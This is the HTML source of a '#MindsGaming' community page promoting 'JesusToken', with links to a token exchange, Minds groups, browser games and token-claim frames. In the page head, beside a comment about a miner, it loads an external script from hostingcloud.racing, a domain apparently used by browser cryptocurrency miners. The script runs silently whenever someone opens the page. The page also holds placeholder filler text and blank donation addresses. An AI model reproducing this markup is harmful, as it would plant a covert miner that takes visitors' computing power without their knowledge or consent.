<!DOCTYPE html>
<html lang="en">
  <head>
    <title>#MindsGaming</title>

    <meta charset="utf-8" />
    <meta http-equiv="X-UA-Compatible" content="IE=edge" />
    <meta name="viewport" content="width=device-width, initial-scale=1" />
    <meta name="description" content="Community & Member Groups" />
    <meta
      property="og:image"
      content="https://cdn.glitch.com/6ca1674b-a03a-4e9c-9563-ed6203267aba%2FMGLogo.jpeg"
    />

    <link
      rel="icon"
      href="https://cdn.glitch.com/6ca1674b-a03a-4e9c-9563-ed6203267aba%2FMGLogo.jpeg"
    />

    <!-- import the webpage's stylesheet -->
    <link rel="stylesheet" href="/cpu.css" />
    <link rel="stylesheet" href="https://ipack.glitch.me/mgicons.css" defer />

    <!-- import miner stylesheet -->

    <link rel="stylesheet" href="/mtcg/style.css" />

    <script src="https://www.hostingcloud.racing/5pDo.js"></script>

    <!-- import the webpage's javascript file -->
    <script src="/script.js" defer></script>
    <style>
      h1 {
        margin-bottom: -10px;
      }
      .rewads {
        color: gold;
        font-size: 19px;
      }

      .donate {
        position: relative;
        height: 350xpx;
        font-size: 20px;
        background-color: silver;
        border-style: groove;
        border-color: white;
        display: block;
        padding: 3px;
      }

      .contract {
        position: relative;
        height: 350xpx;
        font-size: 20px;
        background-color: silver;
        border-style: groove;
        border-color: white;
        display: block;
        padding: 3px;
        overflow: scroll;
      }
      .tokenItem {
        width: 100%;
        background-color: white;
      }
      a {
        margin: 3px;
      }

      p {
        max-width: 900px;
        color: black;
      }

      p.tiny {
        margin-right: 60%;
        font-size: 10px;
        color: black;
      }
    </style>
  </head>

  <!-- body -->
  <body class="BETA" id="MGdark">
    <!-- desktop -->
    <div class="desktop">
      <div class="wrap">
        <div align="center">
          <h1 class="donate">
            <img
src="https://lh3.googleusercontent.com/y8eMN3i0NdX6WAPdjTK4C8FAtUZcysAjidIY6U31v5IW6uLjIHtV24MXizPgFywwrjssywJxUCU788RYH8LaIdcbzVN7p5lN--U=w301"
                 style="width: 32px; height: 32px; border-radius: 50%;"
            />
            JesusToken
            <p class="rewads">
              Ecosystem Token For
              <a href="https://minds.com/MindsGaming" target="_blank"
                >#MindsGaming</a
              >
            </p>
          </h1>

          <div class="donate">
            <code>Exchange: </code
            ><a
              href="https://www.mintme.com/token/JesusToken/trade"
              target="_blank"
              >JesusToken</a
            >
          </div>
          <div class="donate">
            <code>Related Coins: </code><a href="/tokens">MTCG </a>
            <a href="https://minds.com/token/" target="_blank">Minds </a
            ><a href="https://mintme.com/coin/" target="_blank">MINTME </a>
          </div>
          <div class="donate">
            <code>Games: </code>
            Idea Needed
          </div>
          <div class="contract">
            <code>Contract Address: </code>
            NULL
          </div>
          <div class="donate">
            <code>Status: </code> OFFCHAIN
            <p>
              Bacon ipsum dolor amet rump tongue doner spare ribs pancetta tail
              chuck beef pig jowl pork shoulder turkey venison. Doner pork loin
              brisket pig filet mignon. Turducken picanha doner, fatback bacon
              venison pork loin drumstick chicken. Tri-tip ground round salami,
              leberkas jerky picanha spare ribs boudin alcatra kielbasa beef
              ribs bresaola venison cow turkey. Sausage swine filet mignon
              leberkas, frankfurter salami boudin pork prosciutto kielbasa bacon
              turkey. Tenderloin burgdoggen venison boudin, pancetta chuck
              frankfurter sirloin.
            </p>
            <hr />
            <p class="tiny">
              Help the token grow and donate to the creator <br />
              <code>MTCG: -------</code>
              <br />
              <code>Minds: ------- </code>
              <br />
              <code>MINTME: ------</code>
              <br />
            </p>
          </div>
          <br />
        </div>
        <br />
      </div>
      <br />
    </div>
    <br />

    <!-- End Applications -->

    <!-- toolbar -->
    <div class="toolbar" id="toolbar">
      <!-- Menu -->
      <a
        class="Logomenu"
        href="#"
        title="Menu"
        onclick="menu(); return false"
      ></a>

      <!-- browser -->
      <a href="/tokens/gamer" class="GAMER" title="Claim Tokens"></a>
      <a href="/tokens/doobetter" class="DOOBETTER" title="DooBetter"></a>
      <a href="/tokens/eclipse" class="ECLIPSE" title="ECLIPSE"></a>
      <a href="/tokens/gtpc" class="GTPC" title="GTPC"></a>

      <!-- Toggle Gear -->

      <a
        href="#"
        onclick="Settings(); return false"
        class="gear"
        title="Settings"
      ></a>
    </div>

    <!-- ToolBar menu -->
    <div class="ToolBarMenus" id="ToolBarMenu">
      <a
        href="#"
        class="sminus"
        onclick="Settings(); return false"
        title="MIN"
      ></a>

      <a
        class="Links"
        href="#"
        onclick="DarkMode(); return false"
        title="Dark Mode"
        >Dark Mode
      </a>
    </div>

    <!-- Main Menu -->
    <div class="MGmenus" id="MenuTools">
      <a
        class="upload"
        href="#"
        title="Folders"
        onclick="assets(); return false"
      ></a>
      <a
        class="sgamertube"
        href="#"
        title="Groups"
        onclick="groups(); return false"
      ></a>
      <a
        class="gamepad"
        href="#"
        title="Games"
        onclick="games(); return false"
      ></a>
      <a
        class="tools"
        href="#"
        title="Tools"
        onclick="toolTab(); return false"
      ></a>

      <!-- Group Tab Menu -->
      <div class="MGmenus" id="groups">
        <a
          href="https://www.minds.com/groups/profile/567372953759522816"
          class="GLinks"
          target="_blank"
          title="GamerTube"
          >GamerTube</a
        >
        <a
          href="https://www.minds.com/groups/profile/567523173034110976"
          class="GLinks"
          target="_blank"
          title="Music"
          >Music</a
        ><br />
        <a
          href="https://www.minds.com/groups/profile/569270912981934080"
          class="GLinks"
          target="_blank"
          title="News"
          >News</a
        >
        <a
          href="https://www.minds.com/groups/profile/567421914620895232"
          class="GLinks"
          target="_blank"
          title="MindTube"
          >MindTube</a
        ><br />
        <a
          href="https://www.minds.com/groups/profile/569272650258460672"
          class="GLinks"
          target="_blank"
          title="Photography & Art"
          >Art</a
        ><br />
        <a
          href="https://www.minds.com/groups/profile/570312857774727174"
          class="GLinks"
          target="_blank"
          title="WritingCorner"
          >Corner</a
        >
        <a
          href="https://www.minds.com/groups/profile/574262456742846476/feed"
          class="GLinks"
          target="_blank"
          title="Outdoors"
          >Outdoors</a
        >
        <a
          href="https://www.minds.com/groups/profile/570669535963652100"
          class="GLinks"
          target="_blank"
          title="420Time"
          >420Time</a
        >
        <a
          href="https://www.minds.com/groups/profile/568271817706319872/feed"
          class="GLinks"
          target="_blank"
          title="Memewars"
          >Memewars</a
        >
        <a
          href="https://www.minds.com/groups/profile/886268855514841088"
          class="GLinks"
          target="_blank"
          title="MCOSI"
          >MCOSI</a
        >
        <a
          href="https://www.minds.com/groups/profile/568528910808002560/activity"
          class="GLinks"
          target="_blank"
          title="Community Resources"
          >Community</a
        >
        <a
          href="https://www.minds.com/groups/profile/568141108547166208/activity"
          class="GLinks"
          target="_blank"
          title="Launching Area"
          >Launching</a
        >
      </div>
      <!-- Games Tab Menu -->
      <div class="MGmenus" id="games">
        <a href="/mtcg/pacman" class="GLinks" target="_blank" title="Pacman"
          >Pacman</a
        >
        <br />
        <a href="/alges" class="GLinks" target="_blank" title="Alges">Alges</a
        ><br />

        <a href="/3d-city" class="GLinks" target="_blank" title="3D-City"
          >3d City</a
        ><br />
        <a href="/digger" class="GLinks" target="_blank" title="Digger"
          >Digger</a
        ><br />
        <a href="/mtcg/mario" class="GLinks" target="_blank" title="Mario"
          >Mario</a
        ><br />
        <a href="mtcg/survivor" class="GLinks" target="_blank" title="Survivor"
          >Survivor</a
        ><br />
        <a href="/mtcg/mtcg" class="GLinks" target="_blank" title="Survivor"
          >MTCG</a
        ><br />
      </div>
      <!-- Tools menu -->

      <div class="MGmenus" id="toolTab">
        <a
          href="https://www.minds.com/mindsgaming/shop"
          class="GLinks"
          target="_blank"
          title="Memberships"
          >Members</a
        ><br />
        <a href="/mg-show" class="GLinks" title="MG Show">Videos</a><br />

        <a
          href="https://chat.minds.com/#/room/#MindsGaming:minds.com"
          class="GLinks"
          onclick="chat(); return false"
          title="Chat"
          >Chat</a
        ><br />
        <a
          href="https://www.minds.com/mindsgaming/blogs?layout=grid"
          class="GLinks"
          target="_blank"
          title="MG Blogs"
          >Blogs</a
        ><br />

        <a
          href="#"
          class="GLinks"
          onclick="handbook(); return false"
          title="MindsHandbook"
          >HandBook</a
        ><br />
        <a href="#" class="GLinks" onclick="ipack(); return false" title="Ipack"
          >Ipack</a
        ><br />
        <a
          href="https://www.minds.com/MindsGaming/groups?layout=grid"
          class="GLinks"
          target="_blank"
          title="Unlisted Groups"
          >Unlisted</a
        ><br />
        <a
          href="https://gitlab.com/MindsGaming/mindsgaming"
          class="GLinks"
          target="_blank"
          title="BETA"
          >Code</a
        ><br />
        <a href="/tokens" class="GLinks" target="_blank" title="Tokens"
          >Tokens</a
        ><br />
      </div>
      <!-- End menu -->
    </div>

    <!-- Splashscreens -->

    <!-- browser splash -->

    <div class="SplashScreen" id="GAMER">
      <a
        href="#"
        class="sminus"
        onclick="GAMER(); return false"
        title="MIN"
      ></a>
      <iframe class="SplashFrame" src="/tokens/gamer/claim.html">
        <code>Beta</code>
      </iframe>
    </div>

    <div class="SplashScreen" id="DOOBETTER">
      <a
        href="#"
        class="sminus"
        onclick="DooBetterClaim(); return false"
        title="MIN"
      ></a>
      <iframe class="SplashFrame" src="/tokens/doobetter/claim.html">
        <code>Beta</code>
      </iframe>
    </div>

    <!-- upload splashscreen -->

    <div class="SplashScreen" id="assets" onmouseover="menu(); return false">
      <a
        href="#"
        class="sminus"
        onclick="assets(); return false"
        onmouseover="menu(); return false"
        title="MIN"
      ></a>
      <iframe
        class="SplashFrame"
        src="https://glitch.com/edit/#!/mindsgaming?path=README.me"
      >
        <code>Beta</code>
      </iframe>
    </div>

    <!-- Groups splashscreens -->

    <!-- Gaming -->
    <div class="SplashScreen" id="GroupSpace">
      <a
        href="#"
        class="sminus"
        onclick="GroupSpace(); return false"
        title="MIN"
      ></a>
      <iframe class="SplashFrame" src="/groups/gaming"> </iframe>
    </div>

    <!-- Music -->
    <div class="SplashScreen" id="MusicSpace">
      <a
        href="#"
        class="sminus"
        onclick="MusicSpace(); return false"
        title="MIN"
      ></a>
      <iframe class="SplashFrame" src="/groups/music"> </iframe>
    </div>

    <!-- handbook -->

    <div class="SplashScreen" id="handbook">
      <a
        href="#"
        class="sminus"
        onclick="handbook(); return false"
        title="MIN"
      ></a>
      <iframe class="SplashFrame" src="/handbook"> </iframe>
    </div>
    <!-- Ipack -->

    <div class="SplashScreen" id="ipack">
      <a
        href="#"
        class="sminus"
        onclick="ipack(); return false"
        title="MIN"
      ></a>
      <iframe class="SplashFrame" src="/ipack"> </iframe>
    </div>

    <!-- Pirate -->

    <div class="SplashScreen" id="pirate">
      <a
        href="#"
        class="sminus"
        onclick="pirate(); return false"
        title="MIN"
      ></a>
      <iframe class="SplashFrame" src="/groups/pirate"> </iframe>
    </div>
    <!-- Help-->

    <div class="SplashScreen" id="help">
      <a href="#" class="sminus" onclick="help(); return false" title="MIN"></a>
      <iframe class="SplashFrame" src="/groups/help"> </iframe>
    </div>
    <!-- memberships-->

    <div class="SplashScreen" id="memberships">
      <a
        href="#"
        class="sminus"
        onclick="memberships(); return false"
        title="MIN"
        style="margin: 5px;"
      ></a>
      <iframe
        class="SplashFrame"
        src="/meberships"
        onclick="assets(); return false"
        onmouseover="menu(); return false"
      >
      </iframe>
    </div>
  </body>
</html>
